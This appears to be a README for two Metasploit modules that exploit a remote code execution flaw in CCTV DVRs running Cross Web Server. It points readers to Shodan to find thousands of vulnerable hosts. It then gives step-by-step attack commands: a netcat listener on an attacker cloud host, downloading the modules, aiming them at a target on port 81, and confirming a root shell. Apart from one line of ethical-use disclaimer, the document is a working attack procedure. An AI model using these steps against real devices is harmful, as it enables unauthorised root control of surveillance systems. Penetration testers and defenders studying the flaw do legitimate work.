This code is adapted from the genius Rotem Kerner's python exploit into 2 metasploit modules to allow for easy pen testing of systems that utilise CCTV DVR's. If you go onto shodan.io and type in Cross Web Server, there are thousands of vulnerable CCTV DVR web hosts, many of them presumably already exploited. This exploit should only be used for ethical, legal and authorised penetration tests.
http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
Instructions for Use:
Set up a cloud host or web facing IP.
Step 1:
On this cloud host type
nc -l 666
On another host, or the same host in another window (making sure metasploit is installed)
Step 1:
cd /usr/share/metasploit-framework/modules/exploits/linux/http
Step 2:
wget https://github.com/freddiebarrsmith/CCTV-Remote-Code-Execution-Metasploit-Module/archive/master.zip && unzip -j master.zip
Step 3:
edit the line containing host = "192.168.0.1" inside CCTV_DVRwrite.rb to be the ip of your cloud host
Step 4:
type
msfconsole
Step 5:
use exploit/linux/http/CCTV_DVRwrite
set RHOST yourtargethost.com
set RPORT 81
exploit
(then wait for it to execute, ignore errors for the most part)
Step 6:
use exploit/linux/http/CCTV_DVRrun
set RHOST yourtargethost.com
set RPORT 81
exploit
(then wait for it to execute, ignore errors for the most part)
Step 7:
go back to your cloud or web-facing ip netcat session and type in:
whoami
to get the answer
root
if the exploit executed succesfully